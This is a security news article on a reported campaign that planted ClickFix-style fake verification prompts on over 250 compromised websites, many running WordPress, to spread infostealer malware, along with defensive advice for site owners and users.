Attackers have compromised more than 250 legitimate websites, many running WordPress, and are using them to deliver ClickFix-style malware lures that can infect visitors with infostealers, according to research highlighted by Rapid7.
The campaign abused trusted sites rather than obvious malicious domains. Infosecurity Magazine reported that the affected pages included news outlets and a U.S. Senate candidate’s official website. Visitors were shown fake verification or troubleshooting prompts designed to trick them into copying and executing malicious commands themselves, a hallmark of ClickFix attacks.
That user-assisted step matters because it can sidestep some automated defenses. Instead of relying on a browser exploit or a booby-trapped attachment, the attackers push the victim to launch the infection chain manually. Rapid7 said the end goal was infostealer malware, which typically targets browser-stored passwords, session cookies, autofill data and cryptocurrency wallet information.
The report does not publicly tie the campaign to a specific CVE or named malware family. That leaves open several possible entry points for the website compromises, including vulnerable plugins or themes, stolen administrator credentials, or weaknesses in hosting environments. What is clear is the scale: hundreds of real websites were turned into malware delivery infrastructure.
The wider risk extends beyond the initial infection. Stolen credentials and session tokens are commonly reused for account takeover, fraud and follow-on intrusions. For site owners, the campaign is another reminder that a compromised CMS can become a distribution point for attacks against readers, customers and supporters. For users, a familiar domain is no guarantee of safety, and prompts asking them to paste commands into PowerShell, Terminal or a browser dialog should be treated as suspicious.
Defenders should watch for unusual JavaScript injections on web servers, suspicious command-line execution on endpoints, and signs of browser credential theft. Organizations that rely on WordPress should prioritize patching, plugin reviews and stronger admin protections. Users who suspect exposure should reset passwords, revoke active sessions and consider using a trusted VPN on untrusted networks, though it will not stop this type of social engineering on its own.
